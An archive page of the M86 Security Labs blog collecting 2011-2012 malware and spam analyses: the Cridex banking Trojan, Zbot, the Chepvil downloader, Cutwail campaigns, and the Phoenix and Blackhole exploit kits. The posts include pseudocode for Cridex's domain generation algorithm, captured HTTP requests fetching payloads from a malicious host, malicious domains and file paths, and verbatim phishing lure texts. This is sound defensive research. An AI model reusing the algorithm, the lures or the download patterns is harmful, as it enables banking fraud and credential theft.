Spam « M86 Security Labs Blog

Archive for the ‘Spam’ Category

The Cridex Trojan Targets 137 Financial Organizations in One Go

By Daniel Chechik • March 1st, 2012 • Botnets Cybercrime Malware Spam

A few weeks ago M86 Security Labs alerted that cybercriminals managed to compromise hundreds of WordPress-based sites. These attacks started with several large spam campaigns as reported in our most recent blog post on Cutwail. These emails included embedded URL links or HTML attachments that tricked the user to browse to the compromised Web sites. All these links eventually lead to Web pages infected with the Phoenix exploit kit. These cybercriminals operate Fast flux networks, which are a DNS technique used by botnets to hide the main C&C servers.

After the target machine is successfully exploited, the Phoenix exploit kit downloads a Trojan to the victim’s machine. The downloaded Trojan is recognized by antivirus vendors under several names such as Cridex, Carberp and Dapato. Antivirus detection is quite low and only ten out of 43 antivirus scanners in VirusTotal can detect it.

VirusTotal scan of Cridex

Let’s take a look how this Trojan operates step by step.

Once the Cridex Trojan is loaded to the victims’ machine it executes several actions. First, it copies itself to drive C: as KB00447841.exe and creates the following files:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT
C:\Documents and Settings\Administrator\Application Data\KB00447841.exe

The BAT file upon its execution removes the original malware downloaded by the Phoenix exploit kit.

In the second phase, the malware hooks into the “explorer.exe” process. Then it communicates with its C&C which is done over Fast flux networks to make it harder to identify and shut down their C&C servers. Every several hours one domain becomes unavailable and is replaced by another one. In some cases, the traffic flow of the Trojan can look like this:

Fiddler dump of the Trojan’s traffic activity

Cridex consistently tries to find a live proxy to reach the C&C server. At first glance the domain names look random. However, when taking a closer look, we see that the Trojan generates a new domain name before every attempt to access the C&C:

Ollydbg - Debugging of "Explorer.exe" infected by the Trojan

Here is a pseudo code of the Trojan’s code:

ECX = ECX * 0x19660D
ECX = ECX + 0x3C6EF35F
ECX = ECX << 0×10
ECX = ECX – 0x7FFF
EAX = ECX
EDX = 0
EAX = EAX XOR 0×88
EBP = 0x1A
EAX = EAX / 0x1A
EDX = EAX % 0x1A
ESI++
EDX = EDX + 0×61
Address[EBX + ESI] = DX
If not reached the end of the domain name length continue

Using this logical algorithm to generate and access domains, the cybercriminals can resume the attack even after their server(s) are offline for some period of time.

Once the Trojan finds a live proxy, it connects to the C&C server and downloads a customized configuration from the Cridex botnet. The cybercriminals are currently running multiple botnets with over 25,000 infected machines.

Cridex botnet control panel

This Trojan’s capability is basically similar to Zeus and SpyEye. It collects information from the user’s machine and sends it to the C&C server. This information can include, for example, cookies, FTP credentials and email accounts.

The configuration panel of the Cridex Trojan

The cybercriminals can track specific Web sites that are accessed by the user by taking screenshots of every page the user accessed in real time. They can also blacklist URLs, redirect URLs and more. Same as with the Zeus Trojan, the administrators can supply a code to be injected into Web pages. The Cridex Trojan intercepts browser requests and changes the displayed content according to the configuration, written by the administrator of the botnet. This way the cybercriminal can trick the user to enter valuable information the cybercriminal is looking for, without raising suspicion.

What’s new in the Cridex Trojan compared to Zeus or SpyEye?

Cridex has a “WORLD BANKER CENTER” plug-in which includes a database of 137 banks. Yes, one hundred, thirty seven different banks or financial organizations from all over the world!

Data collected by the "WORLD BANK CENTER" plug-in

This control panel provides simple user experience for the cybercriminals. It contains the structure of the banking organization’s Web site pages, so the Trojan can identify which valuable fields to send back to the C&C. Moreover, the cybercriminals can create and change forms that are normally completed by the victim.

Templates of "WORLD BANK CENTER" plug-in

In conclusion, the Cridex Trojan takes control of the victim’s machines and allows it to collect information and potentially make fraudulent transactions by manipulating the bank Web pages.

M86 MailMarshal Secure Email Gateway customers are protected against these blended threat spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix exploit kit and in particular against the Cridex Trojan.

Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez • February 16th, 2012 • Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, fortunately its default settings prevented the malicious JavaScript in the HTML source code from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example of a more recent spam campaign. This particular message claims to be an invoice from a random company where an .HTM file is attached pretending to be an invoice file. Here, the sample spam was opened using Microsoft Outlook and the attachment just shows the icon of the default browser of the system. Again, in order for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.

So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugin. In our test machine, the landing page successfully exploited our browser’s default PDF reader with the Libtiff integer overflow in Adobe Reader vulnerability. The exploit ended up downloading and installing malware in our test computer, which at the time of writing, was a data-stealing Trojan with the antivirus detection name Cridex.

The landing page that contains the exploit code is a kit used by cybercriminals particularly for this spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use, all they need is their own webserver that can run PHP server scripts. The image shown below is the screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—“ referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.

Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.

Tags: Cutwail | Exploit Kits | Malicious Spam | Malware

M86 Security Threat Report for the Second Half of 2011 is Now Available

By Ziv Mador • February 8th, 2012 • Botnets Cybercrime Reports Social Networking Spam Vulnerabilities

We are releasing today our bi-annual Threat Report for 2H 2011. The report relies on M86 Security Labs analysis of spam and malware activity, including the current use of exploit kits, fraudulent digital certificates and social networking schemes. Key points from the M86 Security Labs for the second half of 2011 are:
1. Targeted attacks became sophisticated and pursued a wider range of organizations, including commercial, national critical infrastructure and military targets.
2. Use of stolen or fraudulent digital certificates has become more common, especially as part of targeted attacks.
3. In several targeted attacks, malware was hidden by embedding itself in various file formats—with a few cases of multiple embedding layers. This method can evade security software that fails to scan deep enough.
4. Blackhole has become the most prevalent exploit kit in the second half of 2011 with a huge margin over other exploit kits. Some of the exploit kits which were active in the past are rarely used now or were practically abandoned.
5. Newer versions of Blackhole are being deployed first in Eastern Europe. Its authors increased its update frequency and added new exploits and tricks to evade detection, such as checking the software version on the client machine before attempting to exploit it.
6. Fake social media notifications are now a mainstream way for spammers to dupe users into clicking links.
7. Facebook continues to be a conduit for spam and malware, as many campaigns are spreading virally by enticing users to share posts that promise gift cards or other rewards.
8. Hacked, but otherwise legitimate, websites played a major role in distributing spam and malware by redirecting browsers to the ultimate destination.
9. Malicious Web content currently exploits more than 50 vulnerabilities in various software products. The most commonly exploited products are Microsoft Internet Explorer, Oracle Java, Adobe Acrobat Reader, Adobe Flash and Microsoft Office products.
10. The overall volume of spam continued to decline in 2011, reaching a four-year low in December 2011.
11. Eight spamming botnets were responsible for 90% of the spam monitored by M86 Security Labs. All of these botnets are familiar and have been established for some time.
12. The proportion of malicious spam rose in the second half of the year from less than 1% to 5%, including a massive spike in malicious attachments in August and September. Later in the year, the focus shifted from malicious attachments to malicious links that led to exploit kits, in particular, the Blackhole exploit kit.
13. Some noticeable wins by law enforcement authorities and researchers against cybercriminals, botnets and affiliate programs like fake AV and rogue online pharmacies, took place this year.
14. Malicious Web content hosted in China targets mostly older versions of Internet Explorer, which is popular in that country.
15. Almost half of the global malicious Web content is hosted in the U.S. The states hosting most malware are Florida, California, Texas and Washington.

The report provides statistics about the geographical distribution of web-based malware, about the most commonly used exploits and about the prevalence of exploit kits. Statistics about spam categories and spam botnets are also provided. In addition to these statistics, the report includes eleven featured articles about current cyber threats and ends with recommendations for administrators, Website owners and end users.
The M86 Security Labs Report can be downloaded from http://m86.it/2HSecReport.
We hope you find the information in this report useful.
M86 Security Labs

Zbot Trojan spreads through fake ConEdison billing notification email

By Rodel Mendrez • January 13th, 2012 • Spam

Today we came across a new malicious spam campaign that is actively sent out by the Cutwail spam botnet. The suspicious email claims to be a bill summary from the New York-based energy company Con Edison, Inc. It may use the subject line “ConEdison Billing Summary as of <DATE>” and the attachment uses the filename format Billing-Summary-ConEdison-<random numbers>-<Date>.zip.

The attached zip file contains an executable file, which unsurprisingly is a Zbot malware variant. When extracted, the malicious executable uses no disguise. It uses no fake icons of Adobe Reader or Microsft Word, no double file extensions, or excessive use of space in the file name to hide the .EXE extension. The attached file is so dull that average users should easily spot that the file is suspicious.

The good news is that when this particular Zbot sample was run, it failed to communicate to its command and control (CnC) server at plantlunch[dot]ru which turns out to be currently offline.

In conclusion, bill notifications do not usually arrive with an executable file so emails like this should be treated with extreme suspicion. When you see these obvious signs of malware, just stop and delete the email. M86 MailMarshal customers were protected against this campaign from the moment it began.

Cutwail Spam Campaigns Lure Users to Blackhole Exploit Kit

By Rodel Mendrez • December 1st, 2011 • Spam

Over the past few days the Cutwail botnet has been sending out malicious spam campaigns with a variety of themes such as airline ticket orders, Automated Clearing House (ACH), Facebook notification, and scanned document. These campaigns do not have malware attachments, instead the payload is delivered via links to malicious code hosted on the web.

The subject lines used in the Facebook spam campaign are similar to those in the image below. Notice that they use varying letter case and random Facebook profile names.

The message body may look like a legitimate Facebook notification. However, further inspection reveals the underlying link redirecting to a malicious webpage.

Another campaign spammed out by Cutwail claims to be a flight ticket order. The spam can be easily spotted by its subject lines. It looks seemingly like a “forwarded” or “reply” email and uses the subject format shown in the image below.

Here is an example of the message:

There are two things you should notice about this particular spam campaign. Firstly, the visible URL shown does not conform to the URI naming scheme of not having a top level domain, a clumsy mistake from the spammers. Other similar messages use “www.airlines.com” which is a parked domain. Secondly, “Airlines America” in the signature block is not a real airline company unless the spammers meant to imply American Airlines.

Two other spam campaigns resurfaced this week, namely the “Automated Clearing House (ACH)” and the “scanned document”.

The URL link in these campaigns points to a compromised web server that serves a small HTML file. The HTML file then contains a malicious iframe that opens up a Blackhole exploit kit landing page. This is the same exploit kit used in previous spam campaigns such as the Steve Jobs is Alive and fake LinkedIn notifications.

If you are a system administrator, you may want to block the following exploit kit landing pages.

crredret[dot]ru/main.php
www[dot]btredret[dot]ru/main.php
bqredret[dot]ru/main.php

At the time of analysis, loading the exploit kit webpage downloaded SpyEye and the Bobax spambot on to our vulnerable hosts.

“Steve Jobs Alive!” Spam Campaign Leads To Exploit Page

By Rodel Mendrez • October 7th, 2011 • Spam Vulnerabilities

It was a sad day in the technology industry with the recent passing of Apple’s legendary leader, Steve Jobs. Unfortunately, the cyber-criminals see this as an opportunity. Today, we started seeing a Steve Jobs spam campaign, with the subject suggesting that he is still alive.

Steve Jobs Alive!

Steve Jobs Not Dead!

Steve Jobs: Not Dead Yet!

Is Steve Jobs Really Dead?

Sample of the Steve Jobs spam campaign

The URL links in the spam are many and varied. The websites that they point to all look to be hacked by the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a BlackHole exploit kit landing page.

The HTML source code of the Blackhole Exploit kit landing page

The intermediary redirect URLs are random-looking domains, with a top level domain of .ms (Monserrat in case you didn’t know), here are some examples:

hxxp://xnyiinobfb[dot]ce[dot]ms/index.php
hxxp://derhvbq[dot]ce[dot]ms/index.php

The purpose of the exploit kit is to try and exploit vulnerabilities on the system and eventually download malicious executable files. At this stage, we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.

Unfortunately, many people may find this spam campaign “click-worthy” given the icon that Steve Jobs was. The usual advice applies – avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.

An analysis of the ACH spam campaign

By Rodel Mendrez • September 6th, 2011 • Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

The malware code that attempts to connect to the control server

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Massive Rise in Malicious Spam

By Rodel Mendrez • August 16th, 2011 • Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.

Tags: Cutwail | Featured | Malware | Spam

Malicious hotel transaction spam

By Gavin Neale • July 29th, 2011 • Spam

Over the past couple of days we have been seeing numerous spam emails which claim that a wrong transaction was made on your credit card from a hotel.
The subject lines look similar to the following two subjects, with varying hotels

Hotel Sutton Place made wrong transaction
Wrong transaction from your credit card in Four Seasons Resort Scottsdale

We have also seen several different message bodies that try to explain, in fairly bad English, that your credit card has been charged by a hotel and that in order to get your money back you will need to fill in an attached form and send it to your bank.

Dear Guest!
Transaction: Visa 86878_j
This letter notifies that on July 26th, 2011 Hotel made wrong writing-down from your credit account. Total sum of decommissioning is $1937
Due to the termination of service contract between Hotel Melia Deviana and Moverick Company this Hotel was divested accreditation in our company.
For the return of funds please contact your bank and fill information in the attached form.
The detailed copy of made writing-down you can find in the attachment.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Alexander Hargrave,
Manager of Reception Desk & Reservation Departament

Dear Client!
Transaction: Visa 4098_6e
On July 26th, 2011 Hotel made wrong transaction decommissioning from your credit card totaling $1037.
This partner hotel was divested accreditation in Moverick Company with reference of noncompliance of the service contract.
Please see the attached form. You need to fill it in and contact your bank for the return of funds.
In the attachment you will find expense sheet with the sum of wrong transaction writing-down.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Caleb Anketil,
Manager of Reception Desk & Reservation Departament

Attached is a Zip file named RefundFormXXX.zip, where XXX is a random three digit number. Inside this Zip file is an executable file; Refund-Form.exe which has an icon likely intended to deceive unsuspecting victims into thinking that it is in fact some type of form which they can view.

The executable inside the 'RefundForm' Zip file

Once executed this malware downloads the file soft.exe from yomwarayom2001[dot]ru (84.247.61.25). This did not run straight away so we ran it on a separate test machine and verified that this is a fake AV product named ‘Security Protection’.

A further HTTP request is sent to 188.72.202.121, shown below, which requests a module called ‘grabbers’ from load.php.

The HTTP request and response for the encrypted password stealer

The file that is retrieved, called ‘update.dat’ is in fact an encrypted Windows dll file. Once decrypted we discovered that it was a password stealer which targets a huge number of applications including instant messaging programs, poker clients, FTP clients and web browsers looking for stored passwords.

Screenshot of the disassembled password stealer showing some of the targeted applications.

Almost a day later, with still no visible signs that our test machine was infected, the HTTP request below was sent which downloaded the file 1036.exe.

HTTP download of 1036.exe

Within minutes of this download finishing, a fake AV program called ‘Personal Shield pro’ was launched.

Both the attached executable files and those that were downloaded after the initial infection had very low detection rates among anti-virus engines, which highlights the need to be very cautious when opening email attachments and to keep anti-virus software up to date.

Thanks to Rodel Mendrez for his investigation into the password stealer component.